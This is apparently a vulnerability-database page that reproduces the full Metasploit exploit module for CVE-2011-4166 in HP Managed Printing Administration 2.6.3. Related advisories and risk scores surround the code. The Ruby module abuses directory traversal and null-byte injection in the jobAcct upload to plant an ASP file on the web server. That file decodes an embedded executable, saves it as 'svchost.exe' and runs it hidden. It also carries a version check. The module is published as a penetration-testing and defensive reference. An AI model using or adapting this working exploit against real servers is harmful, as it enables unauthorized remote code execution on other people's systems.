Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

HP Managed Printing Administration - jobAcct Remote Command Execution (Metasploit)

🗓️ 22 Jul 2013 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 43 Views

HP Managed Printing Administration jobAcct Remote Command Executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		HP Managed Printing Administration jobAcct Remote Command Execution
19 Jul 201300:00
zdt
0day.today		HP Managed Printing Administration jobAcct Remote Command Execution
22 Jul 201300:00
zdt
Tenable Nessus		HP Managed Printing Administration < 2.6.4 Multiple Vulnerabilities
27 Dec 201100:00
nessus
Tenable Nessus		HP Managed Printing Administration < 2.6.4 Multiple Vulnerabilities
26 Jan 201200:00
nessus
Circl		CVE-2011-4166
22 Jul 201300:00
circl
Check Point Advisories		HP Managed printing Administration jobAcct Remote Command Execution - Ver2 (CVE-2011-4166)
31 Mar 201400:00
checkpoint_advisories
CVE		CVE-2011-4166
27 Dec 201102:00
cve
Cvelist		CVE-2011-4166
27 Dec 201102:00
cvelist
Hewlett-Packard		HPSBPI02732 SSRT100435 rev.2 - HP Managed Printing Administration, Remote Execution of Arbitrary Code and Other Vulnerabilities
20 Dec 201100:00
hp
Metasploit		HP Managed Printing Administration jobAcct Remote Command Execution
18 Jul 201314:39
metasploit
Rows per page
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize
    super(
      'Name'        => 'HP Managed Printing Administration jobAcct Remote Command Execution',
      'Description'    => %q{
        This module exploits an arbitrary file upload vulnerability on HP Managed Printing
        Administration 2.6.3 (and before). The vulnerability exists in the UploadFiles()
        function from the MPAUploader.Uploader.1 control, loaded and used by the server.
        The function can be abused via directory traversal and null byte injection in order
        to achieve arbitrary file upload.  In order to exploit successfully, a few conditions
        must be met: 1) A writable location under the context of Internet Guest Account
        (IUSR_*), or Everyone is required. By default, this module will attempt to write to
        /hpmpa/userfiles/, but you may specify the WRITEWEBFOLDER datastore option to provide
        another writable path. 2)  The writable path must also be readable by a browser,
        this typically means a location under wwwroot. 3) You cannot overwrite a file with
        the same name as the payload.
      },
      'Author'      => [
        'Andrea Micalizzi', # aka rgod - Vulnerability Discovery
        'juan vazquez' # Metasploit module
      ],
      'Platform'    => 'win',
      'References'  =>
        [
          ['CVE', '2011-4166'],
          ['OSVDB', '78015'],
          ['BID', '51174'],
          ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-352/'],
          ['URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03128469']
        ],
      'Targets'     =>
        [
          [ 'HP Managed Printing Administration 2.6.3 / Microsoft Windows [XP SP3 | Server 2003 SP2]', { } ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 21 2011'
    )

    register_options(
      [
        OptString.new('WRITEWEBFOLDER', [ false,  "Additional Web location with file write permissions for IUSR_*" ])
      ], self.class)
  end

  def peer
    return "#{rhost}:#{rport}"
  end

  def webfolder_uri
    begin
      u = datastore['WRITEWEBFOLDER']
      u = "/" if u.nil? or u.empty?
      URI(u).to_s
    rescue ::URI::InvalidURIError
      print_error "Invalid URI: #{datastore['WRITEWEBFOLDER'].inspect}"
      return "/"
    end
  end

  def to_exe_asp(exes = '')

    var_func    = Rex::Text.rand_text_alpha(rand(8)+8)
    var_stream  = Rex::Text.rand_text_alpha(rand(8)+8)
    var_obj     = Rex::Text.rand_text_alpha(rand(8)+8)
    var_shell   = Rex::Text.rand_text_alpha(rand(8)+8)
    var_tempdir = Rex::Text.rand_text_alpha(rand(8)+8)
    var_tempexe = Rex::Text.rand_text_alpha(rand(8)+8)
    var_basedir = Rex::Text.rand_text_alpha(rand(8)+8)

    var_f64name   = Rex::Text.rand_text_alpha(rand(8)+8)
    arg_b64string = Rex::Text.rand_text_alpha(rand(8)+8)
    var_length    = Rex::Text.rand_text_alpha(rand(8)+8)
    var_out       = Rex::Text.rand_text_alpha(rand(8)+8)
    var_group     = Rex::Text.rand_text_alpha(rand(8)+8)
    var_bytes     = Rex::Text.rand_text_alpha(rand(8)+8)
    var_counter   = Rex::Text.rand_text_alpha(rand(8)+8)
    var_char      = Rex::Text.rand_text_alpha(rand(8)+8)
    var_thisdata  = Rex::Text.rand_text_alpha(rand(8)+8)
    const_base64  = Rex::Text.rand_text_alpha(rand(8)+8)
    var_ngroup    = Rex::Text.rand_text_alpha(rand(8)+8)
    var_pout      = Rex::Text.rand_text_alpha(rand(8)+8)

    vbs = "<%\r\n"

    # ASP Base64 decode from Antonin Foller http://www.motobit.com/tips/detpg_base64/
    vbs << "Function #{var_f64name}(ByVal #{arg_b64string})\r\n"
    vbs << "Const #{const_base64} = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\r\n"
    vbs << "Dim #{var_length}, #{var_out}, #{var_group}\r\n"
    vbs << "#{arg_b64string} = Replace(#{arg_b64string}, vbCrLf, \"\")\r\n"
    vbs << "#{arg_b64string} = Replace(#{arg_b64string}, vbTab, \"\")\r\n"
    vbs << "#{arg_b64string} = Replace(#{arg_b64string}, \" \", \"\")\r\n"
    vbs << "#{var_length} = Len(#{arg_b64string})\r\n"
    vbs << "If #{var_length} Mod 4 <> 0 Then\r\n"
    vbs << "Exit Function\r\n"
    vbs << "End If\r\n"
    vbs << "For #{var_group} = 1 To #{var_length} Step 4\r\n"
    vbs << "Dim #{var_bytes}, #{var_counter}, #{var_char}, #{var_thisdata}, #{var_ngroup}, #{var_pout}\r\n"
    vbs << "#{var_bytes} = 3\r\n"
    vbs << "#{var_ngroup} = 0\r\n"
    vbs << "For #{var_counter} = 0 To 3\r\n"
    vbs << "#{var_char} = Mid(#{arg_b64string}, #{var_group} + #{var_counter}, 1)\r\n"
    vbs << "If #{var_char} = \"=\" Then\r\n"
    vbs << "#{var_bytes} = #{var_bytes} - 1\r\n"
    vbs << "#{var_thisdata} = 0\r\n"
    vbs << "Else\r\n"
    vbs << "#{var_thisdata} = InStr(1, #{const_base64}, #{var_char}, vbBinaryCompare) - 1\r\n"
    vbs << "End If\r\n"
    vbs << "If #{var_thisdata} = -1 Then\r\n"
    vbs << "Exit Function\r\n"
    vbs << "End If\r\n"
    vbs << "#{var_ngroup} = 64 * #{var_ngroup} + #{var_thisdata}\r\n"
    vbs << "Next\r\n"
    vbs << "#{var_ngroup} = Hex(#{var_ngroup})\r\n"
    vbs << "#{var_ngroup} = String(6 - Len(#{var_ngroup}), \"0\") & #{var_ngroup}\r\n"
    vbs << "#{var_pout} = Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 1, 2))) + _\r\n"
    vbs << "Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 3, 2))) + _\r\n"
    vbs << "Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 5, 2)))\r\n"
    vbs << "#{var_out} = #{var_out} & Left(#{var_pout}, #{var_bytes})\r\n"
    vbs << "Next\r\n"
    vbs << "#{var_f64name} = #{var_out}\r\n"
    vbs << "End Function\r\n"

    vbs << "Sub #{var_func}()\r\n"
    vbs << "#{var_bytes} = #{var_f64name}(\"#{Rex::Text.encode_base64(exes)}\")\r\n"
    vbs << "Dim #{var_obj}\r\n"
    vbs << "Set #{var_obj} = CreateObject(\"Scripting.FileSystemObject\")\r\n"
    vbs << "Dim #{var_stream}\r\n"
    vbs << "Dim #{var_tempdir}\r\n"
    vbs << "Dim #{var_tempexe}\r\n"
    vbs << "Dim #{var_basedir}\r\n"
    vbs << "Set #{var_tempdir} = #{var_obj}.GetSpecialFolder(2)\r\n"

    vbs << "#{var_basedir} = #{var_tempdir} & \"\\\" & #{var_obj}.GetTempName()\r\n"
    vbs << "#{var_obj}.CreateFolder(#{var_basedir})\r\n"
    vbs << "#{var_tempexe} = #{var_basedir} & \"\\\" & \"svchost.exe\"\r\n"
    vbs << "Set #{var_stream} = #{var_obj}.CreateTextFile(#{var_tempexe},2,0)\r\n"
    vbs << "#{var_stream}.Write #{var_bytes}\r\n"
    vbs << "#{var_stream}.Close\r\n"
    vbs << "Dim #{var_shell}\r\n"
    vbs << "Set #{var_shell} = CreateObject(\"Wscript.Shell\")\r\n"

    vbs << "#{var_shell}.run #{var_tempexe}, 0, false\r\n"
    vbs << "End Sub\r\n"

    vbs << "#{var_func}\r\n"
    vbs << "%>\r\n"
    vbs
  end

  def upload(contents, location)
    post_data = Rex::MIME::Message.new
    post_data.add_part("upload", nil, nil, "form-data; name=\"upload\"")
    post_data.add_part(contents, "application/octet-stream", "binary", "form-data; name=\"uploadfile\"; filename=\"..\\../../wwwroot#{location}\x00.tmp\"")
    data = post_data.to_s
    data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")

    res = send_request_cgi({
      'uri'      => normalize_uri("hpmpa", "jobAcct", "Default.asp"),
      'method'   => 'POST',
      'ctype'    => "multipart/form-data; boundary=#{post_data.bound}",
      'data'     => data,
      'encode_params' => false,
      'vars_get' => {
        'userId' => rand_text_numeric(2+rand(2)),
        'jobId'  => rand_text_numeric(2+rand(2))
        }
      })
    return res
  end

  def check
    res = send_request_cgi({'uri' => normalize_uri("hpmpa", "home", "Default.asp")})
    version = nil
    if res and res.code == 200 and res.body =~ /HP Managed Printing Administration/ and res.body =~ /<dd>v(.*)<\/dd>/
      version = $1
    else
      return Exploit::CheckCode::Safe
    end

    vprint_status("HP MPA Version Detected: #{version}")

    if version <= "2.6.3"
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe

  end

  def exploit
    # Generate the ASP containing the EXE containing the payload
    exe = generate_payload_exe
    # Not using Msf::Util::EXE.to_exe_asp because the generated vbs is too long and the app complains
    asp = to_exe_asp(exe)

    #
    # UPLOAD
    #
    asp_name = "#{rand_text_alpha(5+rand(3))}.asp"
    locations = [
      "/hpmpa/userfiles/images/printers/",
      "/hpmpa/userfiles/images/backgrounds/",
      "/hpmpa/userfiles/images/",
      "/hpmpa/userfiles/",
      "/"
    ]

    locations << normalize_uri(webfolder_uri, asp_name) if datastore['WRITEWEBFOLDER']

    payload_url = ""

    locations.each {|location|
      asp_location = location + asp_name
      print_status("#{peer} - Uploading #{asp.length} bytes to #{location}...")
      res = upload(asp, asp_location)
      if res and res.code == 200 and res.body =~ /Results of Upload/ and res.body !~ /Object\[formFile\]/
        print_good("#{peer} - ASP Payload successfully wrote to #{location}")
        payload_url = asp_location
        break
      elsif res and res.code == 200 and res.body =~ /Results of Upload/ and res.body =~ /Object\[formFile\]/
        print_error("#{peer} - Error probably due to permissions while writing to #{location}")
      else
        print_error("#{peer} - Unknown error while while writing to #{location}")
      end
    }

    if payload_url.empty?
      fail_with(Exploit::Failure::NotVulnerable, "#{peer} - Failed to upload ASP payload to the target")
    end

    #
    # EXECUTE
    #
    print_status("#{peer} - Executing payload through #{payload_url}...")
    send_request_cgi({ 'uri' => payload_url})
  end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Jul 2013 00:00Current
7High risk
Vulners AI Score7
CVSS 27.5
EPSS0.63467
metasploithttpclientremotearbitrary file uploadvulnerabilitywindowscveosvdbbidfile write permissionsiusr\_*exploituploadnull byte injectiondirectory traversalpayloaddisclosure datezdi-11-352c03128469
43